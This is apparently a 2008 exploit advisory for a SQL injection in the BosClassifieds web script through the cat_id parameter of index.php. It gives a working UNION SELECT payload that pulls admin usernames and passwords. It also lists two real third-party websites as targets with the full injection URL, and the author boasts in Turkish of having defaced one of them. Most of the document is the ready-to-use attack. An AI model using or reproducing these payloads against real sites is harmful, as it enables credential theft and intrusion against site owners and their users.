[~] Powered by BosClassifieds remote sql inj [~] [~] index.php (catid_id) [~] [~] ---------------------------------------------------------- [~] Discovered By: ZoRLu [~] [~] Date: 03.11.2008 [~] [~] Home: www.z0rlu.blogspot.com [~] [~] contact: trt-turk@hotmail.com [~] [~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( [~] [~] N0T: a.q kpss yuzden nete ara verebilirim : ( [~] [~] ----------------------------------------------------------- Exploit: http://localhost/script_path/index.php?cat_id=[SQL] [SQL]= -9999+union+select+concat(username,0x3a,password)+from+bosdevUUS-- example 1: ( you must look title ) http://myvaldosta.com/bosclass/index.php?cat_id=-9999+union+select+concat(username,0x3a,password)+from+bosdevUUS-- ( bunu ben hackledim canIm sIkILIyodu : ) anasayfayI kontrol edin http://myvaldosta.com ) example 2: ( you must look title ) http://wikiventa.com/index.php?cat_id=-9999+union+select+concat(username,0x3a,password)+from+bosdevUUS-- [~]---------------------------------------------------------------------- [~] Greetz tO: str0ke & all Muslim HaCkeRs [~] [~] yildirimordulari.org & darkc0de.com [~] [~]----------------------------------------------------------------------